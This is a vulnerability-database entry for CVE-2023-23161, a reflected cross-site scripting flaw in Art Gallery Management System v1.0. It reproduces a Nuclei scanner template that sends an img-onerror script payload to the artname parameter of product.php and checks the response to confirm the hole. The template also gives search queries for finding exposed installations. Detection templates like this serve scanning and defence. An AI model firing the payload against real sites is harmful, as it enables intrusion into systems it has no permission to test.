Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-23161
HistoryJul 22, 2023 - 6:07 a.m.

Art Gallery Management System Project v1.0 - Cross-Site Scripting

2023-07-2206:07:25
ProjectDiscovery
github.com
7
cve2023
packetstorm
art
gallery
xss
art_gallery_management_system_project

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.4%

A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
id: CVE-2023-23161

info:
  name: Art Gallery Management System Project v1.0 - Cross-Site Scripting
  author: ctflearner
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/51214
    - https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt
    - https://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-23161
    - http://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-23161
    cwe-id: CWE-79
    epss-score: 0.00315
    epss-percentile: 0.702
    cpe: cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpgurukul
    product: art_gallery_management_system
    fofa-query:
      - title="Art Gallery Management System"
      - title="art gallery management system"
  tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project,phpgurukul

http:
  - method: GET
    path:
      - '{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'center"><img src=1 onerror=alert(document.domain)>'
          - 'Art Type'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d7208d5230ec463f1ea5043d8ba95a0a0085662a9af3eb4642b4bedb565306f0022100c7442bc3c595a32bbadf5ab28025e4022ce0664213b14b32d26e347957f76fad:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.4%

Related for NUCLEI:CVE-2023-23161